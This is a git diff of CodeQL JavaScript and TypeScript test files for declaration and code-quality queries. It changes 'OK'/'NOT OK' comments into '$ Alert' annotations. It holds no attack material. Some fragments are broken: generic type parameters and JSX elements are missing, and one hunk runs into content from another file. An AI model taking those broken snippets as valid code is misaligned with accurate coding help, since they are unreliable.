b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js @@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts index 5aadd17c4d58..a9713de9685e 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts @@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..6912653c27b5 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" @@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js @@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..142bcc8d55a3 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +\u0078 // $ Alert ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js @@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts @@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts @@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..17f6b2c218f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,8 +21,7 @@ function K(x, y) { return y; } -// NOT OK -/** +/** // $ Alert * @param {*} x the first argument * @param {*} y the second argument */ @@ -30,7 +29,7 @@ function K(x, y) { return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
    Hello
    ); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..7d76d97b96bb 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..708ef01ba929 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git 